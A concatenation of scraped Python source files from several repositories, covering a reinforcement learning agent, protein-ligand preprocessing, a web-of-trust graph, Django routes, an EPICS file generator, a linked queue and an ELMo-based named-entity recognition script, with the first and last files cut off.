pi_model_lr, tau, percentile_param, \n learning_iter_per_fit):\n self.pi_model = pi_model\n self.noise = noise\n self.tau = tau\n self.percentile_param = percentile_param\n self.learning_iter_per_fit = learning_iter_per_fit\n self.optimizer = optim.Adam(params=self.pi_model.parameters(), lr=pi_model_lr)\n return None\n \n def fit(self, sessions):\n #get elite states and actions\n elite_states, elite_actions, elite_session_n = self.get_elite_states_and_actions(sessions)\n \n #learn\n if 0 < elite_session_n < len(sessions):\n for _ in 
range(self.learning_iter_per_fit):\n self.update_policy(elite_states, elite_actions)\n return None\n \n def get_elite_states_and_actions(self, sessions):\n #get threshold of total rewards according to percentile parameter\n total_rewards = [sum(session['rewards']) for session in sessions]\n total_reward_threshold = np.percentile(total_rewards, self.percentile_param)\n \n #get elite states and actions\n elite_states, elite_actions = [], []\n elite_session_n = 0\n for session in sessions:\n if sum(session['rewards']) >= total_reward_threshold:\n session_len = min(len(session['states']), len(session['actions']))\n elite_states.extend(session['states'][:session_len])\n elite_actions.extend(session['actions'][:session_len])\n elite_session_n += 1\n\n return elite_states, elite_actions, elite_session_n\n \n def update_model(self, model, optimizer, loss):\n #gradient step\n copy_pi_midel = deepcopy(self.pi_model)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n \n #soft update\n for param, copy_param in zip(self.pi_model.parameters(), copy_pi_midel.parameters()):\n param.data.copy_(self.tau * param + (1 - self.tau) * copy_param)\n return None\n \n def reset(self):\n self.noise.reset()\n self.noise.reduce()\n return None\n\n\nclass CEM_Discrete(CEM):\n def __init__(self, pi_model, noise, pi_model_lr, tau=1e-2, percentile_param=70, \n learning_iter_per_fit=16, greedy_policies=False):\n\n super().__init__(pi_model, noise, pi_model_lr, tau, \n percentile_param, learning_iter_per_fit)\n \n self.noise = noise\n self.greedy_policies = greedy_policies\n return None\n \n def get_action(self, state):\n if np.random.uniform() < self.noise.threshold:\n return self.noise.get()\n else:\n probs = self.get_probs(self.pi_model, state)\n if self.greedy_policies:\n action = np.argmax(probs.detach().data.numpy())\n else:\n dist = torch.distributions.Categorical(probs)\n action = int(dist.sample())\n return action\n \n def get_probs(self, model, state):\n return func.softmax(model(state), -1)\n \n def update_policy(self, elite_states, elite_actions):\n #get loss\n logits = self.pi_model(elite_states)\n elite_actions = torch.LongTensor(elite_actions)\n loss = func.cross_entropy(logits, elite_actions)\n \n #learn\n self.update_model(self.pi_model, self.optimizer, loss)\n return None\n \nclass CEM_Continuous(CEM):\n \n def __init__(self, action_min, action_max, pi_model, noise, \n pi_model_lr=1e-3, tau=1e-2, percentile_param=70, learning_iter_per_fit=16):\n \n super().__init__(pi_model, noise, pi_model_lr, tau, \n percentile_param, learning_iter_per_fit)\n \n self.action_min = action_min\n self.action_max = action_max\n return None\n \n def get_action(self, state):\n action = self.pi_model(state).detach().numpy() + self.noise.get()\n action = self.transform_interval(action)\n return np.clip(action, self.action_min, self.action_max)\n \n def transform_interval(self, action):\n return transform_interval(action, self.action_min, self.action_max)\n \n def update_policy(self, elite_states, elite_actions):\n #get loss\n elite_actions = torch.FloatTensor(elite_actions)\n pred_actions = self.transform_interval(self.pi_model(elite_states))\n loss = torch.mean((pred_actions - elite_actions) ** 2)\n \n #learn\n self.update_model(self.pi_model, self.optimizer, loss)\n return None\n \n 
","repo_name":"imm-rl-lab/reinforcement_learning_baseline","sub_path":"Agents/CEM.py","file_name":"CEM.py","file_ext":"py","file_size_in_byte":4952,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"8047111922","text":"import os\nimport pickle\nimport torch\nimport numpy as np\nimport pandas as pd\nfrom Bio.PDB import PDBParser\nimport rdkit.Chem as Chem\nfrom rdkit.Chem import Draw\nfrom rdkit.Chem import AllChem\nfrom rdkit import rdBase\nfrom tqdm import tqdm\nimport glob\nimport torch\nimport torch.nn.functional as F\nfrom io import StringIO\nimport sys\nfrom Bio.PDB.PDBIO import PDBIO\nfrom Bio.PDB.PDBIO import Select\nimport scipy\nimport scipy.spatial\nfrom rdkit.Geometry import Point3D\nimport gvp\nimport gvp.data\ndef read_mol(sdf_fileName, mol2_fileName, verbose=False):\n rdBase.LogToPythonStderr()\n stderr = sys.stderr\n sio = sys.stderr = StringIO()\n mol = Chem.MolFromMolFile(sdf_fileName, sanitize=False)\n problem = False\n try:\n Chem.SanitizeMol(mol)\n mol = Chem.RemoveHs(mol)\n sm = Chem.MolToSmiles(mol)\n except Exception as e:\n sm = str(e)\n problem = True\n if problem:\n mol = Chem.MolFromMol2File(mol2_fileName, sanitize=False)\n problem = False\n try:\n Chem.SanitizeMol(mol)\n mol = Chem.RemoveHs(mol)\n sm = Chem.MolToSmiles(mol)\n problem = False\n except Exception as e:\n sm = str(e)\n problem = True\n\n if verbose:\n print(sio.getvalue())\n sys.stderr = stderr\n return mol, problem\n\n\ndef write_renumbered_sdf(toFile, sdf_fileName, mol2_fileName):\n # read in mol\n mol, _ = read_mol(sdf_fileName, mol2_fileName)\n # reorder the mol atom number as in smiles.\n m_order = list(mol.GetPropsAsDict(includePrivate=True, includeComputed=True)['_smilesAtomOutputOrder'])\n mol = Chem.RenumberAtoms(mol, m_order)\n w = Chem.SDWriter(toFile)\n w.write(mol)\n w.close()\ndef read_pdbbind_data(fileName):\n with open(fileName) as f:\n a = f.readlines()\n info = []\n for line in a:\n if line[0] == '#':\n continue\n lines, ligand = line.split('//')\n pdb, resolution, year, affinity, raw = lines.strip().split(' ')\n ligand = ligand.strip().split('(')[1].split(')')[0]\n # print(lines, ligand)\n info.append([pdb, resolution, year, affinity, raw, ligand])\n info = pd.DataFrame(info, columns=['pdb', 'resolution', 'year', 'affinity', 'raw', 'ligand'])\n info.year = info.year.astype(int)\n info.affinity = info.affinity.astype(float)\n return info\nthree_to_one = {'ALA': 'A', 'CYS': 'C', 'ASP': 'D', 'GLU': 'E', 'PHE': 'F', 'GLY': 'G', 'HIS': 'H', \n 'ILE': 'I', 'LYS': 'K', 'LEU': 'L', 'MET': 'M', 'ASN': 'N', 'PRO': 'P', 'GLN': 'Q', \n 'ARG': 'R', 'SER': 'S', 'THR': 'T', 'VAL': 'V', 'TRP': 'W', 'TYR': 'Y'}\n\ndef get_protein_feature(res_list, pro_res_list=None, plm=True):\n # protein feature extraction code from https://github.com/drorlab/gvp-pytorch\n # ensure all res contains N, CA, C and O\n res_list = [res for res in res_list if (('N' in res) and ('CA' in res) and ('C' in res) and ('O' in res))]\n # construct the input for ProteinGraphDataset\n # which requires name, seq, and a list of shape N * 4 * 3\n structure = {}\n structure['name'] = \"placeholder\"\n structure['seq'] = \"\".join([three_to_one.get(res.resname) for res in res_list])\n coords = []\n ca= []\n # print('get_protein_feature!')\n for res in res_list:\n res_coords = []\n for atom in [res['N'], res['CA'], res['C'], res['O']]:\n if atom == res['CA']:\n ca.append(list(atom.coord))\n res_coords.append(list(atom.coord))\n coords.append(res_coords)\n structure['coords'] 
= coords\n torch.set_num_threads(1) # this reduce the overhead, and speed up the process for me.\n dataset = gvp.data.ProteinGraphDataset([structure])\n protein = dataset[0]\n if plm and pro_res_list:\n model, alphabet = esm.pretrained.esm2_t33_650M_UR50D()\n model.eval()#.to(device)\n # res_list = res_list.to(device)\n # pro_res_list = pro_res_list.to(device)\n batch_convert = alphabet.get_batch_converter()\n protein_ca, index = pocket_in_protein(res_list, pro_res_list)\n token_reps = get_plm_reps(protein_ca, model, batch_convert)\n pocket_token_reps = token_reps[index].to(\"cpu\")\n protein.seq = pocket_token_reps\n # print('pass!')\n return protein.x, protein.seq, protein.node_s, protein.node_v, protein.edge_index, protein.edge_s, protein.edge_v\n\ndef get_clean_res_list(res_list, verbose=False, ensure_ca_exist=False, bfactor_cutoff=None):\n clean_res_list = []\n for res in res_list:\n hetero, resid, insertion = res.full_id[-1]\n if hetero == ' ':\n if res.resname not in three_to_one:\n if verbose:\n print(res, \"has non-standard resname\")\n continue\n if (not ensure_ca_exist) or ('CA' in res):\n if bfactor_cutoff is not None:\n ca_bfactor = float(res['CA'].bfactor)\n if ca_bfactor < bfactor_cutoff:\n continue\n clean_res_list.append(res)\n else:\n if verbose:\n print(res, res.full_id, \"is hetero\")\n return clean_res_list\n\ndef remove_hetero_and_extract_ligand(res_list, verbose=False, ensure_ca_exist=False, bfactor_cutoff=None):\n # get all regular protein residues. and ligand.\n clean_res_list = []\n ligand_list = []\n for res in res_list:\n hetero, resid, insertion = res.full_id[-1]\n if hetero == ' ':\n if (not ensure_ca_exist) or ('CA' in res):\n # in rare case, CA is not exists.\n if bfactor_cutoff is not None:\n ca_bfactor = float(res['CA'].bfactor)\n if ca_bfactor < bfactor_cutoff:\n continue\n clean_res_list.append(res)\n elif hetero == 'W':\n # is water, skipped.\n continue\n else:\n ligand_list.append(res)\n if verbose:\n print(res, res.full_id, \"is hetero\")\n return clean_res_list, ligand_list\n\ndef get_res_unique_id(residue):\n pdb, _, chain, (_, resid, insertion) = residue.full_id\n unique_id = f\"{chain}_{resid}_{insertion}\"\n return unique_id\n\ndef save_cleaned_protein(c, proteinFile):\n res_list = list(c.get_residues())\n clean_res_list, ligand_list = remove_hetero_and_extract_ligand(res_list)\n res_id_list = set([get_res_unique_id(residue) for residue in clean_res_list])\n\n io=PDBIO()\n class MySelect(Select):\n def accept_residue(self, residue, res_id_list=res_id_list):\n if get_res_unique_id(residue) in res_id_list:\n return True\n else:\n return False\n io.set_structure(c)\n io.save(proteinFile, MySelect())\n return clean_res_list, ligand_list\n\ndef split_protein_and_ligand(c, pdb, ligand_seq_id, proteinFile, ligandFile):\n clean_res_list, ligand_list = save_cleaned_protein(c, proteinFile)\n chain = c.id\n # should take a look of this ligand_list to ensure we choose the right ligand.\n seq_id = ligand_seq_id\n # download the ligand in sdf format from rcsb.org. 
because we pdb format doesn't contain bond information.\n # you could also use openbabel to do this.\n url = f\"https://models.rcsb.org/v1/{pdb}/ligand?auth_asym_id={chain}&auth_seq_id={seq_id}&encoding=sdf&filename=ligand.sdf\"\n r = requests.get(url)\n open(ligandFile , 'wb').write(r.content)\n return clean_res_list, ligand_list\n\n\n\n\ndef generate_sdf_from_smiles_using_rdkit(smiles, rdkitMolFile, shift_dis=30, fast_generation=False):\n mol_from_rdkit = Chem.MolFromSmiles(smiles)\n if fast_generation:\n # conformation generated using Compute2DCoords is very fast, but less accurate.\n mol_from_rdkit.Compute2DCoords()\n else:\n mol_from_rdkit = generate_conformation(mol_from_rdkit)\n coords = mol_from_rdkit.GetConformer().GetPositions()\n new_coords = coords + np.array([shift_dis, shift_dis, shift_dis])\n write_with_new_coords(mol_from_rdkit, new_coords, rdkitMolFile)\n\n\n # save protein chains that belong to chains_in_contact\n class MySelect(Select):\n def accept_residue(self, residue, chains_in_contact=chains_in_contact):\n pdb, _, chain, (_, resid, insertion) = residue.full_id\n if chain in chains_in_contact:\n return True\n else:\n return False\n\n io=PDBIO()\n io.set_structure(s)\n io.save(toFile, MySelect())\n\ndef normalize(x):\n return (x - x.min()) / (x.max() - x.min())\n\ndef create_dir(dir_list):\n assert isinstance(dir_list, list) == True\n for d in dir_list:\n if not os.path.exists(d):\n os.makedirs(d)\n\ndef save_model_dict(model, model_dir, msg):\n model_path = os.path.join(model_dir, msg + '.pt')\n torch.save(model.state_dict(), model_path)\n print(\"model has been saved to %s.\" % (model_path))\n\ndef load_model_dict(model, ckpt):\n model.load_state_dict(torch.load(ckpt))\n\ndef del_file(path):\n for i in os.listdir(path):\n path_file = os.path.join(path,i) \n if os.path.isfile(path_file):\n os.remove(path_file)\n else:\n del_file(path_file)\n\ndef write_pickle(filename, obj):\n with open(filename, 'wb') as f:\n pickle.dump(obj, f)\n\ndef read_pickle(filename):\n with open(filename, 'rb') as f:\n obj = pickle.load(f)\n return obj\n\n\n\nclass BestMeter(object):\n \"\"\"Computes and stores the best value\"\"\"\n\n def __init__(self, best_type):\n self.best_type = best_type \n self.count = 0 \n self.reset()\n\n def reset(self):\n if self.best_type == 'min':\n self.best = float('inf')\n else:\n self.best = -float('inf')\n\n def update(self, best):\n self.best = best\n self.count = 0\n\n def get_best(self):\n return self.best\n\n def counter(self):\n self.count += 1\n return self.count\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n\n def get_average(self):\n self.avg = self.sum / (self.count + 1e-12)\n\n return self.avg\n","repo_name":"DingLuoXMU/ConBAP","sub_path":"supervised/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"1369555543","text":"import logging\nimport asyncio\nimport networkx\nfrom .base_graph import BaseGraph\nfrom .constants import NodeStatus\n\n\nclass WoTGraph(BaseGraph):\n def __init__(self, app, community, nx_graph=None):\n \"\"\"\n Init WoTGraph instance\n :param sakia.core.app.Application app: Application instance\n :param sakia.core.community.Community 
community: Community instance\n :param networkx.Graph nx_graph: The networkx graph\n :return:\n \"\"\"\n super().__init__(app, community, nx_graph)\n\n async def initialize(self, center_identity, account_identity):\n node_status = await self.node_status(center_identity, account_identity)\n\n self.add_identity(center_identity, node_status)\n\n # create Identity from node metadata\n certifier_coro = asyncio.ensure_future(center_identity.unique_valid_certifiers_of(self.app.identities_registry,\n self.community))\n certified_coro = asyncio.ensure_future(center_identity.unique_valid_certified_by(self.app.identities_registry,\n self.community))\n\n certifier_list, certified_list = await asyncio.gather(certifier_coro, certified_coro)\n\n # populate graph with certifiers-of\n certifier_coro = asyncio.ensure_future(self.add_certifier_list(certifier_list,\n center_identity, account_identity))\n # populate graph with certified-by\n certified_coro = asyncio.ensure_future(self.add_certified_list(certified_list,\n center_identity, account_identity))\n\n await asyncio.gather(certifier_coro, certified_coro)\n\n async def get_shortest_path_to_identity(self, from_identity, to_identity):\n \"\"\"\n Return path list of nodes from from_identity to to_identity\n :param identity from_identity:\n :param identity to_identity:\n :return:\n \"\"\"\n path = list()\n\n logging.debug(\"path between %s to %s...\" % (from_identity.uid, to_identity.uid))\n self.add_identity(from_identity, NodeStatus.HIGHLIGHTED)\n\n # recursively feed graph searching for account node...\n await self.explore_to_find_member(from_identity, to_identity)\n\n # calculate path of nodes between identity and to_identity\n try:\n path = networkx.shortest_path(self.nx_graph, from_identity.pubkey, to_identity.pubkey)\n except networkx.exception.NetworkXException as e:\n logging.debug(str(e))\n\n return path\n\n async def explore_to_find_member(self, account_identity, to_identity):\n \"\"\"\n Scan graph to find identity\n :param sakia.core.registry.Identity from_identity: Scan starting point\n :param sakia.core.registry.Identity to_identity: Scan goal\n \"\"\"\n explored = []\n explorable = [account_identity]\n\n while len(explorable) > 0:\n current = explorable.pop()\n certified_list = await current.unique_valid_certified_by(self.app.identities_registry,\n self.community)\n\n await self.add_certified_list(certified_list, current, account_identity)\n if to_identity.pubkey in [data['identity'].pubkey for data in certified_list]:\n return True\n\n explored.append(current)\n for entry in certified_list:\n if entry['identity'] not in explored + explorable:\n explorable.append(entry['identity'])\n\n return False\n","repo_name":"Skanda42/sakia","sub_path":"src/sakia/core/graph/wot_graph.py","file_name":"wot_graph.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"45"} +{"seq_id":"3737234272","text":"from django.conf.urls import patterns, include, url\nfrom django.conf.urls.static import static\nfrom django.conf import settings\nimport django.views\n\nfrom OMRS import views\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'openMRScap.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n #url(r'^$',views.index,name='index'),\n #url(r'^$',views.index,name='server'),\n\n #add other projects URLS\n #url(r'^OMRS/',include('OMRS.urls')),\n\n url(r'^$','OMRS.views.index', name='home'),\n\n 
#url(r'^server/',views.jobs.as_view(),name='server'),\n url(r'^jobs/',views.jobs.as_view(),name='jobs'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^server/$','OMRS.views.server'),\n url(r'^userprofile/$','OMRS.views.userProfile',name='userprofile'),\n url(r'^jobserversettings/$','OMRS.views.userJobSettings'), #lists just the URLS of the servers in the system\n url(r'^restricted/$', 'OMRS.views.restricted', name='restricted'), #not doing anything yet\n\n url(r'^setup/$', 'OMRS.views.post_server_details',name='setup'),\n\n #user details\n url(r'^register/$', 'OMRS.views.register', name='register'),\n url(r'^login/$', 'OMRS.views.user_login',name='login'),\n url(r'^logout/$', 'OMRS.views.user_logout', name='logout'),\n\n #import file\n url(r'^upload/$', 'OMRS.views.upload', name='upload'),\n )\n\nif settings.DEBUG:\n urlpatterns += patterns(\n 'django.views.static',\n (r'media/(?P.*)',\n django.views.static.serve,\n {'document_root': settings.MEDIA_ROOT}),\n )\n","repo_name":"omiltoro/softbrew","sub_path":"openMRScap/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"39535418026","text":"import sys\nimport re\n\n#python3.8 GenWaveformPV.py Setpt_list.txt ai WaveValue\nargc = len(sys.argv)\n#print(argc)\nif argc != 4:\n print('Usage:python3.8 '+str(sys.argv[0])+' PVlistFile Datatype(ai/bi/longin,ao/bo/longout) WaveformName ')\n raise SystemExit('EX)python3.8 '+str(sys.argv[0])+' Setpt_list.txt ai WaveValue')\n\nfilename = str(sys.argv[1])\ndtype = str(sys.argv[2]).lower()\nwfname = str(sys.argv[3])\n\ndatatype = ''\nif(dtype == 'ao' or dtype == 'ai'): \n datatype = 'double'\nelif(dtype == 'longin' or dtype == 'longout'): datatype = 'int'\nelif(dtype == 'bi' or dtype == 'bo'): datatype = 'bool'\n\nfieldlist = []\nvaluelist = ['\\\"\\\"', '\\\"\\\"', '\\\"\\\"', 'YES']\nif(dtype == 'ai' or dtype == 'bi' or dtype == 'longin'):\n fieldlist = ['DESC', 'VAL', 'INP', 'PINI']\nelse: \n fieldlist = ['DESC', 'VAL', 'OUT', 'PINI']\n\npvlist = []\nf = open(filename, 'r')\nfor line in f:\n if(line[0] == '#'): continue\n pvlist.append(line.rstrip('\\n'))\nf.close()\n\nseqfilename = \"snc\"+filename.rsplit('.', 1)[0]+\"WF\"\ntemplfilename = 'templ'+filename.rsplit('.', 1)[0]\nsubfilename = 'sub'+filename.rsplit('.', 1)[0]\nwffilename = 'wf'+filename.rsplit('.', 1)[0]\n\nseqExt = \".stt\"\ndbdExt = \".dbd\"\ntemplExt = \".template\"\nsubExt = \".sub\"\nvdbExt = \".vdb\"\n\nseq = open('../src/'+seqfilename+seqExt, \"w\")\ndbd = open('../src/'+seqfilename+dbdExt, \"w\")\ntempl = open('../Db/'+templfilename+templExt, \"w\")\nsub = open('../Db/'+subfilename+subExt, \"w\")\nvdb = open('../Db/'+wffilename+vdbExt, \"w\")\n#########################################################\nlenlist = len(pvlist)\nnl = '\\n'\ntab = '\\t'\nopen = '{'\nclose = '}'\ncharsize = 60\nprefix = '$(SYS)$(SUBSYS)$(DEV)$(SUBDEV)'\nsignal = '$(SIGNAL)'\ncharnull = \"'\\\\0'\"\n#########################################################\n########### Waveform vdb Generation ###################\nsncText = f'\\\nrecord(waveform, \"{prefix}{wfname}\"){nl}\\\n{open}{nl}\\\n field(DESC, \"Debug Waveform\") {nl}\\\n field(NELM, \"{lenlist}\") {nl}\\\n field(FTVL, \"{datatype.upper()}\") {nl}\\\n{close}{nl}'\nvdb.write(sncText)\nvdb.close()\n#########################################################\n########### Seqencer DBD Generation ###################\nsncText = 
\"registrar(\"+seqfilename+\"Registrar)\\n\"\ndbd.write(sncText)\ndbd.close()\n########### Seqencer File Generation ###################\nsncText = f'program {seqfilename} {nl}{nl}\\\noption +r; {nl}\\\n{datatype} wfList[{lenlist}];{nl}\\\nassign wfList to {open}{nl}' \nseq.write(sncText)\nfor orgidx, pvname in enumerate(pvlist):\n idx = orgidx + 1\n if(idx%5 == 0 and idx == lenlist):\n sncText = f'\"{pvname}\"{nl}'\n elif(idx%5 == 0 and idx != lenlist):\n sncText = f'\"{pvname}\",{nl}'\n elif(idx == lenlist):\n sncText = f'\"{pvname}\"{nl}'\n else:\n sncText = f'\"{pvname}\",'\n seq.write(sncText)\nprefix = prefix.replace('$(','{')\nprefix = prefix.replace(')','}')\nsncText = f'{close};{nl}{nl}\\\nmonitor wfList;{nl}\\\nevflag evWave;{nl}\\\nsync wfList to evWave;{nl}\\\n{datatype} wfValue[{lenlist}];{nl}\\\nassign wfValue to \"{prefix}{wfname}\";{nl}\\\nmonitor wfValue; {nl}\\\nss make{seqfilename} {nl}\\\n{open}{nl}\\\n state ini{nl}\\\n {open}{nl}\\\n when(TRUE){nl}\\\n {open}{nl}\\\n efSet(evWave);{nl}\\\n {close}state MakeWaveform{nl}\\\n {close}{nl}\\\n state MakeWaveform{nl}\\\n {open}{nl}\\\n when(efTestAndClear(evWave)){nl}\\\n {open}{nl}\\\n int index = 0;{nl}\\\n for(;index < {lenlist};index++){nl}\\\n wfValue[index]=wfList[index];{nl}{nl}\\\n pvPut (wfValue, SYNC);{nl}\\\n {close}state MakeWaveform{nl}\\\n {close}{nl}\\\n{close}'\nseq.write(sncText)\nseq.close()\n##############################################################\n\nsncText = f'{nl}\\\nrecord({dtype}, \"{signal}\"){nl}\\\n{open}{nl}'\ntempl.write(sncText)\n\nlistcnt = len(fieldlist)\nfor idx, field in enumerate(fieldlist):\n sncText = f'\\\n field({field}, {valuelist[idx]} ){nl}'\n templ.write(sncText)\n\nsncText =f'{close}{nl}'\ntempl.write(sncText)\ntempl.close()\n###################################################\n########### subtitution File Generation ###################\nsncText = f'file \"db/{templfilename+templExt}\" {open} pattern{nl}'\nsub.write(sncText)\nsignal = re.split('[$()]',signal)\nopen = '{'\ncomma =','\nsncText = '{'+signal[2]+','\nsncText = '{message: <{padcnt}}'.format(message = sncText, padcnt=40)\nsub.write(sncText)\n\nfor idx, field in enumerate(fieldlist):\n idx = idx+1\n if(idx == len(fieldlist)):\n sncText = field\n else:\n sncText = field+','\n sncText = '{message: <{padcnt}}'.format(message = sncText, padcnt=20)\n sub.write(sncText)\nsncText = '}\\n'\nsub.write(sncText)\n\nfor cnt in range(lenlist):\n sncText = '{'+pvlist[cnt]+','\n sncText = '{message: <{padcnt}}'.format(message = sncText, padcnt=40)\n sub.write(sncText)\n for idx, value in enumerate(valuelist):\n idx = idx+1\n if(value == \"\\\"\\\"\"): value = \"\"\n if(idx == len(valuelist)):\n sncText = \"\\\"\"+ value + \"\\\"\"\n else:\n sncText = \"\\\"\" + value+'\\\",'\n sncText = '{message: <{padcnt}}'.format(message = sncText, padcnt=20)\n sub.write(sncText)\n sncText = '}\\n'\n sub.write(sncText)\n\nsncText = '}\\n'\nsub.write(sncText)\nsub.close()\n\nprint('Successfully Generated File:', templfilename+templExt, seqfilename+seqExt)\n","repo_name":"Sangil-Lee/Work","sub_path":"siteApps/SCL3Cooldown-Final/cooldownApp/python/GenWaveformPV.py","file_name":"GenWaveformPV.py","file_ext":"py","file_size_in_byte":5343,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"36998573262","text":"class EmptyQueue(Exception):\n \"\"\" Custom exception class for Empty Stack \"\"\"\n pass\n\nclass LinkedQueue:\n \"\"\" FIFO (Fist In First Out) implementation using Python Linked list 
\"\"\"\n\n class _node:\n \"\"\" non-public class for Node of Linked List \"\"\"\n __slots__ = '_element', '_next'\n\n def __init__(self, e, next):\n self._element = e\n self._next = next\n \n def __init__(self):\n \"\"\" Create empty queue \"\"\"\n self._head = None\n self._tail = None\n self._size = 0\n\n def __len__(self):\n \"\"\" return number of elements in queue \"\"\"\n return self._size\n\n def is_empty(self):\n \"\"\" return True if queue is empty \"\"\"\n return self._size == 0\n\n def put(self, e):\n \"\"\" Add element to queue \"\"\"\n newnode = self._node(e, None)\n if self._size == 0:\n self._head = newnode\n else:\n self._tail._next = newnode\n self._tail = newnode\n self._size += 1\n\n def first(self):\n \"\"\" return but do not remove first element of queue \"\"\"\n if not self.is_empty():\n return self._head._element\n else:\n raise EmptyQueue('Queue is empty') #Raise an excepton if Queue is empty\n\n def get(self):\n \"\"\" remove first element from queue \"\"\"\n if not self.is_empty():\n e = self._head._element\n self._head = self._head._next\n self._size -= 1\n if self.is_empty():\n self._tail = None\n return e\n else:\n raise EmptyQueue('Queue is empty') #Raise an excepton if Queue is empty\n\nif __name__ == \"__main__\":\n try:\n q = LinkedQueue()\n\n print('Size of Queue {}'.format(len(q)))\n\n q.put(1)\n q.put('a')\n q.put(2.1)\n q.put('Test')\n print('Size of Queue {}'.format(len(q)))\n\n print('First element is {}'.format(q.first())) #check the first element\n\n print('Get element from queue {}'.format(q.get()))\n print('Size of Queue {}'.format(len(q)))\n print('Get element from queue {}'.format(q.get()))\n print('Size of Queue {}'.format(len(q)))\n print('Get element from queue {}'.format(q.get()))\n print('Size of Queue {}'.format(len(q)))\n print('Get element from queue {}'.format(q.get()))\n print('Size of Queue {}'.format(len(q)))\n #try get when queue is empty\n print('Get element from queue {}'.format(q.get()))\n print('Size of Queue {}'.format(len(q)))\n except Empty as e:\n print(e)\n\n\n\n","repo_name":"vizeit/DSnAlgorithms","sub_path":"src/datastructures/LinkedQueue.py","file_name":"LinkedQueue.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"36330987735","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nos.chdir('C:\\\\CMU\\\\Kaggle\\\\Entity Extraction')\nplt.style.use(\"ggplot\")\ndata = pd.read_csv(\"ner_dataset.csv\", encoding=\"latin1\")\ndata = data.drop(['POS'], axis =1)\ndata = data.fillna(method=\"ffill\")\ndata.tail(12)\nwords = set(list(data['Word'].values))\nwords.add('PADword')\nn_words = len(words)\nn_words\ntags = list(set(data[\"Tag\"].values))\nn_tags = len(tags)\nn_tags\n\n# this Class is in charge of converting every sentence with its named entities (tags) \n# into a list of tuples [(word, named entity), …]\nclass SentenceGetter(object):\n \n def __init__(self, data):\n self.n_sent = 1\n self.data = data\n self.empty = False\n agg_func = lambda s: [(w, t) for w, t in zip(s[\"Word\"].values.tolist(),s[\"Tag\"].values.tolist())]\n self.grouped = self.data.groupby(\"Sentence #\").apply(agg_func)\n self.sentences = [s for s in self.grouped]\n \n def get_next(self):\n try:\n s = self.grouped[\"Sentence: {}\".format(self.n_sent)]\n self.n_sent += 1\n return s\n except:\n return None\n \ngetter = SentenceGetter(data)\nsent = getter.get_next()\nprint(sent)\n[('Thousands', 'O'), ('of', 'O'), 
('demonstrators', 'O'), ('have', 'O'), ('marched', 'O'), ('through', 'O'), ('London', 'B-geo'), ('to', 'O'), ('protest', 'O'), ('the', 'O'), ('war', 'O'), ('in', 'O'), ('Iraq', 'B-geo'), ('and', 'O'), ('demand', 'O'), ('the', 'O'), ('withdrawal', 'O'), ('of', 'O'), ('British', 'B-gpe'), ('troops', 'O'), ('from', 'O'), ('that', 'O'), ('country', 'O'), ('.', 'O')]\nsentences = getter.sentences\nprint(len(sentences))\n\nlargest_sen = max(len(sen) for sen in sentences)\nprint('biggest sentence has {} words'.format(largest_sen))\n\n\nplt.hist([len(sen) for sen in sentences], bins=50)\nplt.show()\n\n# the longest sentence has 140 words in it and we can see that almost all \n# of the sentences have less than 60 words in them\n\n# In order to feed our sentences into a LSTM network, \n# they all need to be the same size. looking at the distribution graph, \n# we can set the length of all sentences to 50 and add a generic word for the empty spaces; \n# this process is called padding.\n\nmax_len = 50\nX = [[w[0]for w in s] for s in sentences]\nnew_X = []\nfor seq in X:\n new_seq = []\n for i in range(max_len):\n try:\n new_seq.append(seq[i])\n except:\n new_seq.append(\"PADword\")\n new_X.append(new_seq)\nnew_X[15]\n\n# and the same applies for the named entities but we need to map our labels to numbers this time\nfrom keras.preprocessing.sequence import pad_sequences\ntags2index = {t:i for i,t in enumerate(tags)}\ny = [[tags2index[w[1]] for w in s] for s in sentences]\ny = pad_sequences(maxlen=max_len, sequences=y, padding=\"post\", value=tags2index[\"O\"])\ny[15]\n\n\n# Next we split our data into training and testing set and then we import tensorflow Hub \n# ( a library for the publication, discovery, and consumption of reusable parts of \n# machine learning models) to load the ELMo embedding feature and keras to start building our network.\n\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\nimport tensorflow_hub as hub\nfrom keras import backend as K\nX_tr, X_te, y_tr, y_te = train_test_split(new_X, y, test_size=0.1, random_state=2018)\nsess = tf.Session()\nK.set_session(sess)\nelmo_model = hub.Module(\"https://tfhub.dev/google/elmo/2\", trainable=True)\nsess.run(tf.global_variables_initializer())\nsess.run(tf.tables_initializer())\n\n\n# since we have 32 as the batch size, feeding the network must be \n# in chunks that are all multiples of 32\nbatch_size = 32\ndef ElmoEmbedding(x):\n return elmo_model(inputs={\"tokens\": tf.squeeze(tf.cast(x, tf.string)),\"sequence_len\": tf.constant(batch_size*[max_len])\n },\n signature=\"tokens\",\n as_dict=True)[\"elmo\"]\n \n \nfrom keras.models import Model, Input\nfrom keras.layers.merge import add\nfrom keras.layers import LSTM, Embedding, Dense, TimeDistributed, Dropout, Bidirectional, Lambda\n\ninput_text = Input(shape=(max_len,), dtype=tf.string)\nembedding = Lambda(ElmoEmbedding, output_shape=(max_len, 1024))(input_text)\nx = Bidirectional(LSTM(units=512, return_sequences=True,\n recurrent_dropout=0.2, dropout=0.2))(embedding)\nx_rnn = Bidirectional(LSTM(units=512, return_sequences=True,\n 